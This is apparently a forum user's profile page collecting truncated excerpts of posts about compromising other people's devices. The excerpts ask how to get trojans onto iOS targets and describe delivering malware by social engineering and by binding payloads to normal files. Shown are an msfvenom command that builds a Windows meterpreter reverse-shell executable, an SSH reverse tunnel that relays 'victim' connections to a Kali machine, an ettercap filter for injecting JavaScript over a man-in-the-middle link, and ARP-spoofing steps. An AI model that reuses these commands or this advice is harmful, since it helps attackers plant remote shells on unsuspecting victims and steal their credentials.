About kdlsw


  1. I do not have too much experience with iOS. For Android, a simple social engineering to let the victim install the malware apk would be sufficient. But from my understanding, all apps on iOS are required to be installed via the App Store, if I cannot poison the traffic of the victim, what's the usual way to deliver a trojan or malware to a target? Or if there are any good articles/books I can look into? Thanks!
  2. This is exactly what I was trying to do, the entire ssh thing was meant to accomplish this goal, but it did not work. If I do ssh -N -R 80:localhost:80 user@aaa.aaa.aaa.aaa on my "local" console, and run apache on my "local", I was able to access the "local" apache server by accessing aaa.aaa.aaa.aaa:80 from outside. But this trick did not work with metasploit, I mean if I run ssh -N -R 12345:localhost:12345 user@aaa.aaa.aaa.aaa and set the multi-handler to listen on local machine at 12345, while the trojan was configured to send stager or a direct shell to aaa.aaa.aaa.aaa
  3. @digip Thank you very much for replying to me, I think I did not address my situation and question clearly, and it leads to some misunderstanding, I am sorry about that. I am not trying to let victims connect to my local machine via ssh, I am trying to let them connect to one of my servers via a standard meterpreter reverse tcp connection, and the server will send this connection back to my local machine, like this : Victims--------(reverse tcp)--------> my server-----------(remote SSH)--------->my local kali The reasons I am doing this are 1:
  4. My kali machine is in a LAN, in order to get a reverse connection from the victim outside the LAN, I set up a remote ssh tunnel ssh -N -R 45679:localhost:45679 user@aaa.aaa.aaa.aaa -p 45678 The ssh server is also inside another LAN, but port forwarding is possible, so I forwarded 45678 as ssh port, and 45679 as the reverse connection port. Tested with netcat, and apache server, worked. Now, here is the configuration of the malware generated by msfvenom msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=aaa.aaa.aaa.aaa LPORT=45679 -f exe -o mal.exe And here is the multi/handl
  5. I found it quite difficult to actually get a shell these days, I am wondering how you guys do it, anyway, here is what I did On the LAN side, with mitm attack and injection, beef, it’s reasonably efficient to harvest credentials, but a little hard to pwn a device, usually I need to send a fake social engineering request to let the victim run some payloads. Remotely, I can bind some malicious payloads with normal files, and with a lot of social engineering, I can sometimes get a shell then escalate privilege with my scripts. But these tricks (both LAN and internet) are not always reliable
  6. Thank you, this is helpful! I will try it!
  7. @digip Thanks, I will look into that. So many options for mitm these days, I just tested MITMF, another similar tool, which didn't work for me too well, hope this one is good. Thank you.
  8. I'm trying to perform a javascript injection with ettercap 0.8.2 and its filter, but it did not work. All the relevant topics I found are before 2016, I am not sure if this kind of attack still works now? Anyway, this is my filter script if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Nothing!"); msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "<head>")) { replace("<head>", "<HEAD>"); msg("Code injected"); } } And I run it as e
  9. Hi, I did a pentest in a LAN, some weird things happened. This LAN is a little unusual, there are two routers, say A and B, A is directly connected to an optical fiber, doing PPPoE, to the WAN, it has a gateway of, B is connected to A, wireless router, with a gateway of All the clients and my Kali machine are connected to B. Target has an IP of Here is what I did with Kali, I use the following to arp spoof the target and router B arpsoof -i eth0 -t arpsoof -i eth0 -t sysctl -w ne
  10. Thank you! I will take a look at them, thanks!
  11. I know it was possible to embed some malware into a web page back in those days when JDB method worked. Is it possible to execute a malware on the client simply by letting it browse a web page these days? Thanks!